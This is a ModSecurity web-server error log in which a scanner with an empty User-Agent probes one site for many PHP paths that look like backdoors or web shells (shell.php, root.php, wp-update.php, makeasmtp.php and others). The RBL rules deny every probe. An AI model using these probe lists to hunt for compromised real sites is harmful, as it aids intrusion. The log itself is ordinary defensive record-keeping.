[Tue May 26 13:11:52.798586 2026] [security2:error] [pid 496740:tid 496957] [client 20.151.117.104:5454] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/upload.php"] [unique_id "ahVOwOvOeft4ltnLrH4zhgAAAFc"]
[Tue May 26 13:11:52.798706 2026] [security2:error] [pid 496740:tid 496957] [client 20.151.117.104:5454] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/upload.php"] [unique_id "ahVOwOvOeft4ltnLrH4zhgAAAFc"]
[Tue May 26 13:11:52.946052 2026] [security2:error] [pid 496740:tid 496956] [client 20.151.117.104:27699] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "grandconclaveindia.org.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVOwOvOeft4ltnLrH4zlQAAAFY"]
[Tue May 26 13:11:53.018269 2026] [security2:error] [pid 496740:tid 496919] [client 20.151.117.104:27699] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/155.php"] [unique_id "ahVOwevOeft4ltnLrH4zmQAAADE"]
[Tue May 26 13:11:53.018431 2026] [security2:error] [pid 496740:tid 496919] [client 20.151.117.104:27699] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/155.php"] [unique_id "ahVOwevOeft4ltnLrH4zmQAAADE"]
[Tue May 26 13:11:53.168070 2026] [security2:error] [pid 496740:tid 496907] [client 20.151.117.104:21645] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/themes/about.php"] [unique_id "ahVOwevOeft4ltnLrH4zoAAAACU"]
[Tue May 26 13:11:53.168212 2026] [security2:error] [pid 496740:tid 496907] [client 20.151.117.104:21645] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/themes/about.php"] [unique_id "ahVOwevOeft4ltnLrH4zoAAAACU"]
[Tue May 26 13:11:53.312814 2026] [security2:error] [pid 496740:tid 496925] [client 20.151.117.104:37142] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-update.php"] [unique_id "ahVOwevOeft4ltnLrH4zpwAAADc"]
[Tue May 26 13:11:53.312969 2026] [security2:error] [pid 496740:tid 496925] [client 20.151.117.104:37142] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-update.php"] [unique_id "ahVOwevOeft4ltnLrH4zpwAAADc"]
[Tue May 26 13:11:53.456937 2026] [security2:error] [pid 496740:tid 496922] [client 20.151.117.104:37163] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/xmrlpc.php"] [unique_id "ahVOwevOeft4ltnLrH4zrwAAADQ"]
[Tue May 26 13:11:53.457067 2026] [security2:error] [pid 496740:tid 496922] [client 20.151.117.104:37163] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/xmrlpc.php"] [unique_id "ahVOwevOeft4ltnLrH4zrwAAADQ"]
[Tue May 26 13:11:53.605322 2026] [security2:error] [pid 496740:tid 496923] [client 20.151.117.104:40646] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/about/function.php"] [unique_id "ahVOwevOeft4ltnLrH4zuwAAADU"]
[Tue May 26 13:11:53.605448 2026] [security2:error] [pid 496740:tid 496923] [client 20.151.117.104:40646] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/about/function.php"] [unique_id "ahVOwevOeft4ltnLrH4zuwAAADU"]
[Tue May 26 13:11:53.733751 2026] [security2:error] [pid 496740:tid 496954] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOwevOeft4ltnLrH4zqwAAAFQ"]
[Tue May 26 13:11:53.747462 2026] [security2:error] [pid 496740:tid 496958] [client 20.151.117.104:40663] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/an.php"] [unique_id "ahVOwevOeft4ltnLrH4zwgAAAFg"]
[Tue May 26 13:11:53.747545 2026] [security2:error] [pid 496740:tid 496958] [client 20.151.117.104:40663] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/an.php"] [unique_id "ahVOwevOeft4ltnLrH4zwgAAAFg"]
[Tue May 26 13:11:53.890029 2026] [security2:error] [pid 496740:tid 496945] [client 20.151.117.104:27958] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/asw.php"] [unique_id "ahVOwevOeft4ltnLrH4zxwAAAEs"]
[Tue May 26 13:11:53.890105 2026] [security2:error] [pid 496740:tid 496945] [client 20.151.117.104:27958] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/asw.php"] [unique_id "ahVOwevOeft4ltnLrH4zxwAAAEs"]
[Tue May 26 13:11:54.022774 2026] [security2:error] [pid 496740:tid 496812] [remote 103.11.102.106:46892] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahVOwevOeft4ltnLrH4zwwAAdEc"]
[Tue May 26 13:11:54.037986 2026] [security2:error] [pid 496740:tid 496893] [client 20.151.117.104:59296] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/item.php"] [unique_id "ahVOwuvOeft4ltnLrH4zywAAABc"]
[Tue May 26 13:11:54.038088 2026] [security2:error] [pid 496740:tid 496893] [client 20.151.117.104:59296] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/item.php"] [unique_id "ahVOwuvOeft4ltnLrH4zywAAABc"]
[Tue May 26 13:11:54.186048 2026] [security2:error] [pid 496740:tid 496975] [client 20.151.117.104:11991] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/jga.php"] [unique_id "ahVOwuvOeft4ltnLrH4z0wAAAGk"]
[Tue May 26 13:11:54.186182 2026] [security2:error] [pid 496740:tid 496975] [client 20.151.117.104:11991] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/jga.php"] [unique_id "ahVOwuvOeft4ltnLrH4z0wAAAGk"]
[Tue May 26 13:11:54.328292 2026] [security2:error] [pid 496740:tid 496928] [client 20.151.117.104:44965] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/mac.php"] [unique_id "ahVOwuvOeft4ltnLrH4z2gAAADo"]
[Tue May 26 13:11:54.328396 2026] [security2:error] [pid 496740:tid 496928] [client 20.151.117.104:44965] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/mac.php"] [unique_id "ahVOwuvOeft4ltnLrH4z2gAAADo"]
[Tue May 26 13:11:54.472495 2026] [security2:error] [pid 496740:tid 496901] [client 20.151.117.104:11968] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/system.php"] [unique_id "ahVOwuvOeft4ltnLrH4z5AAAAB8"]
[Tue May 26 13:11:54.472590 2026] [security2:error] [pid 496740:tid 496901] [client 20.151.117.104:11968] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/system.php"] [unique_id "ahVOwuvOeft4ltnLrH4z5AAAAB8"]
[Tue May 26 13:11:54.615888 2026] [security2:error] [pid 496740:tid 496949] [client 20.151.117.104:16153] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-access.php"] [unique_id "ahVOwuvOeft4ltnLrH4z6AAAAE8"]
[Tue May 26 13:11:54.616003 2026] [security2:error] [pid 496740:tid 496949] [client 20.151.117.104:16153] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-access.php"] [unique_id "ahVOwuvOeft4ltnLrH4z6AAAAE8"]
[Tue May 26 13:11:54.759838 2026] [security2:error] [pid 496740:tid 496966] [client 20.151.117.104:16129] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-load.php"] [unique_id "ahVOwuvOeft4ltnLrH4z7AAAAGA"]
[Tue May 26 13:11:54.759941 2026] [security2:error] [pid 496740:tid 496966] [client 20.151.117.104:16129] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-load.php"] [unique_id "ahVOwuvOeft4ltnLrH4z7AAAAGA"]
[Tue May 26 13:11:54.903148 2026] [security2:error] [pid 496740:tid 496941] [client 20.151.117.104:37144] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/zafir1.php"] [unique_id "ahVOwuvOeft4ltnLrH4z8wAAAEc"]
[Tue May 26 13:11:54.903274 2026] [security2:error] [pid 496740:tid 496941] [client 20.151.117.104:37144] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/zafir1.php"] [unique_id "ahVOwuvOeft4ltnLrH4z8wAAAEc"]
[Tue May 26 13:11:55.047752 2026] [security2:error] [pid 496740:tid 496954] [client 20.151.117.104:21670] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/abc.php"] [unique_id "ahVOw-vOeft4ltnLrH4z9QAAAFQ"]
[Tue May 26 13:11:55.047929 2026] [security2:error] [pid 496740:tid 496954] [client 20.151.117.104:21670] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/abc.php"] [unique_id "ahVOw-vOeft4ltnLrH4z9QAAAFQ"]
[Tue May 26 13:11:55.126200 2026] [security2:error] [pid 496740:tid 496997] [client 91.196.152.130:53105] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.commune.azurmediatec.com"] [uri "/index.php"] [unique_id "ahVOwuvOeft4ltnLrH4z0gAAAH8"]
[Tue May 26 13:11:55.199864 2026] [security2:error] [pid 496740:tid 496935] [client 20.151.117.104:37125] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/c1.php"] [unique_id "ahVOw-vOeft4ltnLrH4z_gAAAEE"]
[Tue May 26 13:11:55.199989 2026] [security2:error] [pid 496740:tid 496935] [client 20.151.117.104:37125] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/c1.php"] [unique_id "ahVOw-vOeft4ltnLrH4z_gAAAEE"]
[Tue May 26 13:11:55.342896 2026] [security2:error] [pid 496740:tid 496881] [client 20.151.117.104:54417] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/root.php"] [unique_id "ahVOw-vOeft4ltnLrH40BAAAAAs"]
[Tue May 26 13:11:55.343010 2026] [security2:error] [pid 496740:tid 496881] [client 20.151.117.104:54417] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/root.php"] [unique_id "ahVOw-vOeft4ltnLrH40BAAAAAs"]
[Tue May 26 13:11:55.485297 2026] [security2:error] [pid 496740:tid 496930] [client 20.151.117.104:40655] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/shell.php"] [unique_id "ahVOw-vOeft4ltnLrH40CwAAADw"]
[Tue May 26 13:11:55.485386 2026] [security2:error] [pid 496740:tid 496930] [client 20.151.117.104:40655] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/shell.php"] [unique_id "ahVOw-vOeft4ltnLrH40CwAAADw"]
[Tue May 26 13:11:55.628576 2026] [security2:error] [pid 496740:tid 496926] [client 20.151.117.104:39940] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-admin/user/index.php"] [unique_id "ahVOw-vOeft4ltnLrH40EAAAADg"]
[Tue May 26 13:11:55.628725 2026] [security2:error] [pid 496740:tid 496926] [client 20.151.117.104:39940] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-admin/user/index.php"] [unique_id "ahVOw-vOeft4ltnLrH40EAAAADg"]
[Tue May 26 13:11:55.771545 2026] [security2:error] [pid 496740:tid 496919] [client 20.151.117.104:49858] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-block.php"] [unique_id "ahVOw-vOeft4ltnLrH40GQAAADE"]
[Tue May 26 13:11:55.771692 2026] [security2:error] [pid 496740:tid 496919] [client 20.151.117.104:49858] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-block.php"] [unique_id "ahVOw-vOeft4ltnLrH40GQAAADE"]
[Tue May 26 13:11:55.920207 2026] [security2:error] [pid 496740:tid 496983] [client 20.151.117.104:37131] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/plugins/linkpreview/il.php"] [unique_id "ahVOw-vOeft4ltnLrH40HQAAAHE"]
[Tue May 26 13:11:55.920352 2026] [security2:error] [pid 496740:tid 496983] [client 20.151.117.104:37131] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/plugins/linkpreview/il.php"] [unique_id "ahVOw-vOeft4ltnLrH40HQAAAHE"]
[Tue May 26 13:11:56.062456 2026] [security2:error] [pid 496740:tid 496966] [client 20.151.117.104:11985] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-header-json.php"] [unique_id "ahVOxOvOeft4ltnLrH40JAAAAGA"]
[Tue May 26 13:11:56.062577 2026] [security2:error] [pid 496740:tid 496966] [client 20.151.117.104:11985] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-header-json.php"] [unique_id "ahVOxOvOeft4ltnLrH40JAAAAGA"]
[Tue May 26 13:11:56.133282 2026] [security2:error] [pid 496740:tid 496990] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOw-vOeft4ltnLrH40GAAAAHg"]
[Tue May 26 13:11:56.208185 2026] [security2:error] [pid 496740:tid 496890] [client 20.151.117.104:27688] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-includes/index.php"] [unique_id "ahVOxOvOeft4ltnLrH40KQAAABQ"]
[Tue May 26 13:11:56.208267 2026] [security2:error] [pid 496740:tid 496890] [client 20.151.117.104:27688] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-includes/index.php"] [unique_id "ahVOxOvOeft4ltnLrH40KQAAABQ"]
[Tue May 26 13:11:56.352384 2026] [security2:error] [pid 496740:tid 496954] [client 20.151.117.104:30862] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/zup.php"] [unique_id "ahVOxOvOeft4ltnLrH40LQAAAFQ"]
[Tue May 26 13:11:56.352485 2026] [security2:error] [pid 496740:tid 496954] [client 20.151.117.104:30862] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/zup.php"] [unique_id "ahVOxOvOeft4ltnLrH40LQAAAFQ"]
[Tue May 26 13:11:56.495526 2026] [security2:error] [pid 496740:tid 496973] [client 20.151.117.104:44939] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/a9.php"] [unique_id "ahVOxOvOeft4ltnLrH40OQAAAGc"]
[Tue May 26 13:11:56.495655 2026] [security2:error] [pid 496740:tid 496973] [client 20.151.117.104:44939] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/a9.php"] [unique_id "ahVOxOvOeft4ltnLrH40OQAAAGc"]
[Tue May 26 13:11:56.638015 2026] [security2:error] [pid 496740:tid 496903] [client 20.151.117.104:59283] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/admin/index.php"] [unique_id "ahVOxOvOeft4ltnLrH40QAAAACE"]
[Tue May 26 13:11:56.638089 2026] [security2:error] [pid 496740:tid 496903] [client 20.151.117.104:59283] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/admin/index.php"] [unique_id "ahVOxOvOeft4ltnLrH40QAAAACE"]
[Tue May 26 13:11:56.785997 2026] [security2:error] [pid 496740:tid 496886] [client 20.151.117.104:39987] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/content.php"] [unique_id "ahVOxOvOeft4ltnLrH40RwAAABA"]
[Tue May 26 13:11:56.786078 2026] [security2:error] [pid 496740:tid 496886] [client 20.151.117.104:39987] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/content.php"] [unique_id "ahVOxOvOeft4ltnLrH40RwAAABA"]
[Tue May 26 13:11:56.928805 2026] [security2:error] [pid 496740:tid 496949] [client 20.151.117.104:6684] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/gg.php"] [unique_id "ahVOxOvOeft4ltnLrH40SwAAAE8"]
[Tue May 26 13:11:56.928896 2026] [security2:error] [pid 496740:tid 496949] [client 20.151.117.104:6684] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/gg.php"] [unique_id "ahVOxOvOeft4ltnLrH40SwAAAE8"]
[Tue May 26 13:11:57.071795 2026] [security2:error] [pid 496740:tid 496966] [client 20.151.117.104:44972] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/makeasmtp.php"] [unique_id "ahVOxevOeft4ltnLrH40UgAAAGA"]
